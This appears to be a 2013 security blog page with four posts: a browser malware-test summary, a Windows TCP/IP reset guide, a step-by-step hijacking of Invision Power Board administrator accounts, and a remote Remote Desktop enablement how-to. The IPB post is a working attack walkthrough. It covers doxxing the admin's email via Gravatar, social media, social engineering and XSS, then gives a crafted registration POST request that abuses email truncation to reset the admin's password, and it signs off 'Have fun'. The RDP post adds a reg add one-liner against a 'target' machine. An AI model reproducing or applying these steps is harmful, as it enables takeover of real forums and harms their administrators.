Monday, May 20, 2013

NSS Labs tested 5 top browsers vs malware

,
As the first line of defense against malware infection, browsers must provide a strong layer of protection. NSS tested the effectiveness of five leading web browsers against 754 samples of real-world malicious software, and the results show significantly differing protection capabilities.


Source
Read more →

Wednesday, May 15, 2013

Unable to connect to network - Rebuild the TCP/IP stack

,
There's a bug when you just connect to a network but no packets are sent, nothing is happening, you havent got an IP address and nothing seems to be working... is the NIC broken? Check below how to fully reset the TCP/IP stack in order to get some things working back again:

  1. Go SafeMode & Networking.
  2. Delete these keys from regedit:
HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Services/Winsock
HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Services/Winsock2
  1. Open the nettcpip.inf file in your %winroot%/inf folder
    (%winroot% is usually c:/windows).
  2. Find the [MS_TCPIP.PrimaryInstall] section. Change the Characteristics value from 0xA0 to 0x80.
  3. Open the properties of the network connection you want to fix. In the General tab, click on the Install button. Click on the Have Disk button, and point the location to %winroot%/inf. After that select TCP/IPv4.
  4. Now you are able to uninstall TCP/IP, do it and reboot.
  5. Go back to your network connection, and install TCP/IP again & reboot, things must be working now.
  6. Open cmd and type the last thing to reset the txtlog:
netsh int ip reset resetlog.txt

Are you connected now? :)

Read more →

Tuesday, May 14, 2013

IPB all version - administrator account hijacking

,

Invision Power Board (abbreviated IPB, IP.Board or IP Board) is an Internet forum software produced by Invision Power Services, Inc. It is written in PHP and primarily uses MySQL as a database management system, although support for other database engines is available. While Invision Power Board is a commercially sold product, there is a large modding community and many of these modifications are free. In addition, many groups offer the download or design of free and paid skins.
  • Required data:
        1) Administrator's login name
The admin login is easily found by clicking on "The moderating Team" link on recent IPB's footer, or using the URL below: index.php?app=forums&module=extras§ion=stats&do=leaders

        2) Administrator's e-mail
Obtaining the admin e-mail may be more complicated as there is no automated way to get it. The attacker can get it through:
     - using whois on domain.tld to get registrar informations
     - looking up a prospective e-mail on Facebook and see if a matching profile shows up
     - using Gravatar (Gravatar is a personal avatar you can find on most blogs, forum, etc comments based on user e-mail address). Attacker can create a script to retrieve an email based on an avatar. For example mine is: http://www.john-jean.com/gravapwnd.php?zboob=john@wargan.com
     - do sourcing using FB, G+, Twitter, Google SERP, ...
     - use SE methods, such as faked e-mail catcher; or use XSSs on known websites consulted by the target.

  • Exploitation:

Previously, on this adviso: we saw that $email is not rejected if it contains spurious whitespace, and that $member_key & $v length is not checked. We also saw some MySQL use-cases. Let's see how we can exploit that:

The e-mail field from the `members` table in IPB is declared as a varchar(150).
Upon registration, we fill the mail member (or admin) for which we want to steal the account to which we add a padding space for the size of the string exceeds 150. Then we add any character after the space one. It is necessary to bypass ajax's validator, feel free to use Burp Suite or Tamperdata.

For example:
Real administrator's email: 'admin@admin.com'
Attacker's mail fill: 'admin@admin.com                                                                                                                                       AAAA'

The SELECT query checking existing e-mails will not yield any result:
SELECT * FROM members WHERE email='admin@admin.com                                                                                                                                       AAAA'

The new account is successfully created. Our account is now using the e-mail address below:
'admin@admin.com                                                                                                                                       '
AAAA has been deleted by MySQL: string exceeding 150 characters are truncated.

At this stage, we have two users with very similar e-mail addresses:
Administrator is: 'admin@admin.com'
Attacker is: 'admin@admin.com                                                                                                                                       '

POST HTTP request looks like (on registration page):

************************ BEGIN OF CODE ************************
POST /~codereview/IPB/index.php?app=core&module=global§ion=register HTTP/1.1
Host: gfy.wargan.com
User-Agent: Wargan/1.0 (WarganOS; Amstrad; rv:1.0)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://gfx.wargan.com/~codereview/IPB/index.php?app=core&module=global§ion=register
Cookie: session_id=00000000000; member_id=2; pass_hash=000000000000; ipsconnect_0000000000=1; coppa=0; rteStatus=rte
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 466

termsread=1&agree_to_terms=1&do=process_form&coppa_user=0&nexus_pass=1&time_offset=1&dst=1&members_display_name=pentest&EmailAddress=pentest%40wargan.com            A&PassWord=pentest&PassWord_Check=pentest&recaptcha_challenge_field=03AHJ_VuvGN728OMAVD0UvgLdylK1KAt8WH0N2aezZZpZfluTG8wJmfSyhiKM0zYb7io5sk62SQ9fQ2Y1XKqPOmEG0hW9DrThpXgEh-DU73qdpZ_OPxkO_v1xg2k1dJSOCk0wZcxufezfezefezFM0LSCwjJn7bbJJMk&recaptcha_response_field=mmotlyiinducted&agree_tos=1
************************* END OF CODE ***************************

We now can change our password. The profile corresponding to our session's e-mail will be used. As already stated, spaces are not taken in consideration. The query will thus actually return the first matching e-mail result: the real administrator account. We will have actually changed the password of the administrator profile.

This flaw is usable both on the registration page and on the user control panel (index.php?app=core&module=usercp&tab=core&area=email).
Have fun :)
Read more →

How-to remotely enable RDC in a LAN

,
Are you an administrator of a network who`d like to sit in his chair a bit longer without the disturbing movements inside that place? How about working remotely without effort? heh, enable Remote Desktop in this LAN easily:
  1. Log into a windows machine as an Administrator and start Registry Editor.
  2. Click on File menu and choose Connect to Network Registry.
  3. Type the host name of the remote computer or browse computers over the network by clicking “Advanced” button, then click ok.
  4. Find HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server.
  5. Find fDenyTSConnection, 1 = disabled, 0 = enabled, choose wisely :)
  6. You have turned RDP on in the remote machine.
There's also another, faster method:
reg add "\\COMPUTERNAME\hklm\system\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0r
Change the underlined COMPUTERNAME with the target network computer, hf.
Read more →